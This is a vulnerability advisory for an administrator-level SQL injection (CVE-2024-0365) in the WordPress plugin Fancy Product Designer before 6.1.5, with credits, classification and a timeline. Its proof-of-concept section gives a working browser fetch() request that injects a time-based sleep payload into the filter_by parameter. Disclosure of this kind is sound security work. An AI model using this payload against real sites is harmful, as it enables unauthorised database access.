WordPress Plugin Vulnerabilities

Fancy Product Designer < 6.1.5 - Admin+ SQL Injection

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators.

Proof of Concept

- Log in as an administrator, and visit /wp-admin/.
- Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer
- Search for "fpd_dismiss_notification" in the page's source, note down the associated nonce
- Send the following fetch() command in your browser's console, and replace $NONCE with the nonce:

```
fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog').then(x=>x.text()).then(x=>console.log(x)) 
```

Notice it takes approximately 20 seconds for the server to answer, confirming our injected SQL statements were executed.

Affects Plugins

Plugin icon
fancy-product-designer
Fixed in 6.1.5

References

CVE
CVE-2024-0365

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher
Ivan Spiridonov
Submitter
Ivan Spiridonov
Submitter website
https://xbz0n.medium.com
Submitter twitter
xbz0n
Verified
Yes
WPVDB ID
4b8b9638-d52a-40bc-b298-ae1c74788c18

Timeline

Publicly Published
2024-02-20 (about 2 months ago)
Added
2024-02-20 (about 2 months ago)
Last Updated
2024-02-20 (about 2 months ago)

Other

Published
Title
Published
2017-12-19
Title
Top 10 <= 2.4.3 - Authenticated SQL Injection
Published
2011-04-26
Title
SermonBrowser <= 0.43.5 - SQL Injection
Published
2014-08-01
Title
WP Forum Server <= 1.7.3 - wpf-insert.php edit_post_id Parameter SQL Injection
Published
2014-08-01
Title
Paid Business Listings - Blind SQL Injection
Published
2020-05-15
Title
Photo Gallery by 10Web < 1.5.55 - Unauthenticated SQL Injection